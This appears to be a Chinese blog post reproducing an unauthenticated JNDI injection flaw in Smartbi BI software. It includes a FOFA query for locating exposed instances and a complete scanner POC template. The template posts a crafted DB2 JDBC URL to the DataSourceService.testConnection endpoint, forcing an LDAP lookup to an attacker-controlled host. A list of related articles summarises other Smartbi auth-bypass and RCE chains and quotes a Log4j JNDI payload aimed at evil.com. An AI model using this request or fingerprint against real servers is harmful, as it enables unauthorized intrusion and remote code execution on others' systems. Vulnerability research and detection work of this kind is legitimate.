Smartbi DB2 params JNDI注入漏洞

原创 已于 2023-12-17 19:06:19 修改 · 1k 阅读 · 8 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#安全 #测试工具

于 2023-12-17 18:09:37 首次发布
本文揭示了思迈特Smartbi商业智能软件中的未授权访问后台接口漏洞,可通过DB2JDBC结合实现JNDI注入。漏洞存在安全风险,且可通过FOFA网络测绘工具检测。提供了一个POC示例和验证方法。

免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。

漏洞描述

Smartbi 是思迈特软件推出的商业智能BI软件,Smartbi存在未授权访问后台接口漏洞,结合 DB2 JDBC 利用方式,可导致 JNDI 注入漏洞。

漏洞影响

  • 未知

网络测绘

  • FOFA:app="SMARTBI" ||body="gcfutil = jsloader.resolve('smartbi.gcf.gcfutil')"

漏洞复现

直接测试存在漏洞

使用其它DNSlog进行OOB测试

漏洞POC

id: smartbi-db2-params-rce

info:
  name: smartbi-db2-params-rce
  author: linfeng7z
  severity: critical
  description: Smartbi 是思迈特软件推出的商业智能BI软件,Smartbi存在未授权访问后台接口漏洞,结合 DB2 JDBC 利用方式,可导致 JNDI 注入漏洞。
  tags: smartbi,rce
  metadata:
    fofa-qeury: app="SMARTBI" || body="gcfutil = jsloader.resolve('smartbi.gcf.gcfutil')"
    veified: true
    max-request: 2

http:
  - raw:
      - |
        GET /vision/index.jsp HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15

      - |
        @timeout: 5s       
        POST //vision/.stub?className=DataSourceService&methodName=testConnection&params=%5B%7B%22driverType%22%3A%22aaa%22%2C%22driver%22%3A%22com.ibm.db2.jcc.DB2Driver%22%2C%22maxConnection%22%3A1%2C%22transactionIsolation%22%3A1%2C%22validationQueryMethod%22%3A3%2C%22url%22%3A%22jdbc%3Adb2%3A%2F%2F127.0.0.1%3A18080%2Fa%3AclientRerouteServerListJNDIName%3Dldap%3A%2F%2F{{interactsh-url}}%22%7D%5D HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15

    matchers:
      - type: word
        part: interactsh_protocol  # Confirms the DNS Interaction
        words:
          - "dns"
漏洞复现 || Smartbi 远程命令执行(1Day)
失心少年
07-06 2856
技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!Smartbi在远程未授权身份认证的情况下,可在绕过用户身份认证机制后未授权访问windowsunloging接口,且该接口存在反序列化远程代码执行漏洞随后可使用获取的身份凭证调用后台接口最终导致代码执行。
智能商业智能(SmartBI)令牌回调漏洞:网络安全分析与修复
YtyVerilog的博客
09-21 184
令牌回调漏洞是一个常见的安全问题,可能导致身份验证机制的绕过和未经授权的访问。在SmartBI平台中,我们展示了一个典型的令牌回调处理函数,并指出了存在的漏洞。为了修复这个漏洞,我们建议在令牌回调处理函数中添加来源验证,可以使用白名单或加密算法来实现验证。在本文中,我们将深入分析这个漏洞,并提供相应的源代码以说明问题所在。令牌回调漏洞指的是在身份验证过程中,应用程序未正确验证令牌回调的来源。如果来源在白名单中,我们继续执行原有的令牌验证和登录逻辑;然而,该实现存在一个严重的漏洞:它没有验证令牌回调的来源。
Smartbi 最新认证绕过导致RCE漏洞分析
漏洞潜伏似暗礁,攻防博弈涌新潮。漫漫安全行愈远,一心求索向九霄。
09-09 608
摘要:Smartbi存在认证绕过漏洞,攻击者可利用默认resid绕过认证获取有效会话。通过分析补丁文件发现漏洞位于/vision/share.jsp,未授权访问可切换为public用户权限。后台还存在JS引擎RCE漏洞,public权限可执行任意代码。受影响版本为Smartbi <= 11.0.99471.25193。文章详细分析了漏洞成因、补丁解密过程及利用方法,提供完整漏洞链的POC。建议用户及时更新至安全版本。
Smartbi 权限绕过漏洞复现(QVD-2023-17461)
0xSec
08-09 3304
Smartbi在特定情况下可被获取用户token,未经授权的攻击者可通过这种方式获取管理员权限,从而以管理员权限接管后台,进一步利用可实现任意代码执行。利用此漏洞需目标可出网。
smartbi token回调获取登录凭证漏洞(二)/smartbi token回调获取登录凭证漏洞(二)-零基础白客知识点
程序员三九的博客
05-20 365
2023年8月8日官方又修复了一处权限绕过漏洞。该漏洞是上一个特定场景下设置Token回调地址漏洞的绕过,未经授权的攻击者可利用该漏洞,获取管理员token,完全接管管理员权限。
【高危】Smartbi 登录代码逻辑漏洞
murphysec的博客
07-24 481
Smartbi是一款企业级商业智能与大数据分析平台。由于Smartbi登录代码存在逻辑缺陷,攻击者可利用该漏洞登录管理员账号,进而利用系统后台加载扩展包功能执行任意代码。
Smartbi 身份认证绕过漏洞
YJ_12340的博客
07-26 1162
因为自己搭建的环境存在一些问题,可能是版本过高的原因,(奇奇怪怪的问题,用户没有权限),所以目前仅仅做概念性验证,对漏洞的原理进行分析。为什么不用原本的登录模式登录,首先原本的登录模式登录是不知道对应的账号和密码的其次我们再对原本的登录逻辑进行简单的分析。这里直接比较的是从数据库中查询出的密码,所以我们就可以直接利用内置的账号和 MD5密码登录。是从数据库中查找用户的密码,根据用户的密码开头的第一位字符,来进行处理比较。我们就注意到从数据库登录的操作也是不需要鉴权就可以进行访问的。
Log4j2的JNDI注入漏洞原理分析与思考
2401_85763924的博客
06-17 1044
通过JNDI,可以将数据库相关的配置在一个支持JNDI服务的容器(通常Tomat等Web容器均支持)中统一完成,并暴露一个简洁的名称,该名称背后绑定着一个 DataSource 对象。再举个更简单的例子,这有点类似DNS提供域名到IP地址的解析服务。可以看到,rc1补丁通过对JNDI Lookup增加白名单的方式,限制默认可以访问的主机为本地IP,限制默认支持的协议类型为 java 、 ldap 、 ldaps ,限制LDAP协议默认可以使用的Java类型为少数基础类型,从而大大减少了默认的攻击面。
漏洞复现-Apache Kafka Clients JNDI注入漏洞 (CVE-2023-25194)
玄道的网安博客
08-11 819
在版本3.3.2及以前,Apache Kafka clients中存在一处JNDI注入漏洞。如果攻击者在连接的时候可以控制属性sasl.jaas.config的值为com.sun.security.auth.module.JndiLoginModule,则可以发起JNDI连接,进而导致JNDI注入漏洞,执行任意命令。方法,做完客户端的判断和安全协议的判断之后,调用了。判断 SASL 模式是否开启,开启了才会往下跟进到。方法,跟进,发现其中还是加载了一些配置。方法,最后 Jndi 注入
金蝶Apusic应用服务器 loadTree JNDI注入漏洞
Keepb1ue的博客
01-05 3359
金蝶Apusic是一款企业级应用服务器,支持Java EE技术,适用于各种商业环境。由于金蝶Apusic应用服务器权限验证不当,使用较低JDK版本,导致攻击者可以向loadTree接口执行JNDI注入,远程加载恶意类,造成远程代码执行。
log4j JNDI注入漏洞复现 CVE-2021-44228
m0_62284238的博客
09-12 598
{sys:java.version}.example.com,而又会解析到sys协议,获取到java.version参数,然后将这个参数值作为子域名的一部分去访问子域名。会通过jndi的lookup()解析dns://${sys:java.version}.example.com,解析到dns协议,会去访问。log4j提供了${}解析功能,当遇到${}时,会通过JNDI的lookup()解析其中的内容。如${jndi:dns://${sys:java.version}.example.com}
用友NC Cloud及YonBIP PMCloudDriveProjectStateServlet JNDI注入漏洞复现
0xSec
01-30 1339
用友NC Cloud及YonBIP 系统PMCloudDriveProjectStateServlet.class接口处存在JNDI注入漏洞,未经身份验证的攻击者可通过此漏洞可以在服务端执行任意命令,获取服务器权限。
【严重】Smartbi商业智能BI软件权限绕过漏洞
murphysec的博客
08-02 649
Smartbi是一款商业智能应用,提供了数据集成、分析、可视化等功能,帮助用户理解和使用他们的数据进行决策。在Smartbi受影响版本中存在权限绕过问题,未授权的攻击者可以通过 RMI 的方式调用 getPassword 接口获取管理员token信息。获取管理员权限后,可进入后台实现任意命令执行,进而对目标系统造成破坏或篡改窃取敏感信息。
Smartbi内置用户登陆绕过漏洞
holyxp的博客
07-25 1559
Smartbi大数据分析产品融合BI定义的所有阶段,对接各种业务数据库、数据仓库和大数据分析平台,进行加工处理、分析挖掘和可视化展现;满足所有用户的各种数据分析应用需求,如大数据分析、可视化分析、探索式分析、复杂报表、应用分享等等。​ Smartbi在安装时会内置几个用户,在使用特定接口时,可绕过用户身份认证机制获取其身份凭证,随后可使用获取的身份凭证调用后台接口,可能导致敏感信息泄露和代码执行。
Smartbi权限绕过漏洞
m0_49025459的博客
08-24 934
该文章来自作者日常学习笔记,也有部分文章是经过作者授权和其他公众号白名单转载,未经授权,严禁转载,如需转载,联系开白。请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者无关。
Smartbi:常见Web应用安全漏洞原理与防御介绍
思迈特Smartbi
06-15 879
Web应用是指采用B/S架构、通过HTTP/HTTPS协议提供服务的统称。随着互联网的普及,Web应用已经融入到我们生活中的方方面面。在企业信息化的过程中,越来越多的应用也都架设在Web平台上。在这些Web访问中,大多数应用不是静态的网页浏览,而是涉及到服务器侧的动态处理。此时,如果技术人员的安全意识不足,例如对程序参数输入等检查不严格,就会导致Web应用安全问题层出不穷。轻则篡改网页内容,重则窃取重要内部数据,更为严重的则是在网页中植入恶意代码,使得网站访问者受到侵害。这使得越来越多的用户关注应用层的安全
jndi注入漏洞
最新发布
09-16
JNDI(Java Naming and Directory Interface)注入漏洞是一种安全漏洞,在Log4j 2的2.0到2.14.1版本中存在该漏洞。攻击者在能控制日志内容的情况下,可传入类似于${jndi:ldap://evil.com/example}的lookup进行JNDI...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值